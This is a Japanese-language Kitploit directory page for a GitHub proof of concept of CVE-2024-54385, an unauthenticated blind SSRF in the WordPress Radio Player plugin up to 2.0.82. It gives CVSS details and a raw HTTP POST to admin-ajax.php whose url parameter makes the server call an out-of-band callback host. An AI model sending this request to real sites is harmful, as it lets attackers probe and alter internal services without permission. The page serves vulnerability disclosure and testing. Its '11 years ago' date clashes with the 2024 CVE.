Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-54385 — Radio Player <= 2.0.82 - 未認証のブラインド型サーバーサイドリクエストフォージェリ(SSRF) | Kitploit
ツール/GitHubGitHub/randomrobbiebf/cve-2024-54385
脆弱性分析エクスプロイトウェブアプリケーション悪用
GitHubrandomrobbiebf/cve-2024-54385

CVE-2024-54385

Radio Player <= 2.0.82 - 未認証のブラインド型サーバーサイドリクエストフォージェリ(SSRF)

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-54385

Radio Player <= 2.0.82 - 未認証のサーバーサイドリクエストフォージェリ

説明

WordPress用プラグイン「Radio Player – Live Shoutcast, Icecast and Any Audio Stream Player for WordPress」は、バージョン2.0.82を含むそれ以前のすべてのバージョンにおいて、サーバーサイドリクエストフォージェリの脆弱性の影響を受けます。これにより、認証されていない攻撃者が、Webアプリケーションを起点として任意の場所へWebリクエストを送信できるようになり、内部サービスの情報の照会や変更に悪用される可能性があります。

詳細

  • タイプ: プラグイン
  • スラッグ: radio-player
  • 影響を受けるバージョン: 2.0.82
  • CVSSスコア: 7.2
  • CVSS評価: 高
  • CVSSベクター: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
  • CVE: CVE-2024-54385
  • ステータス: アクティブ

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8
ツールをダウンロード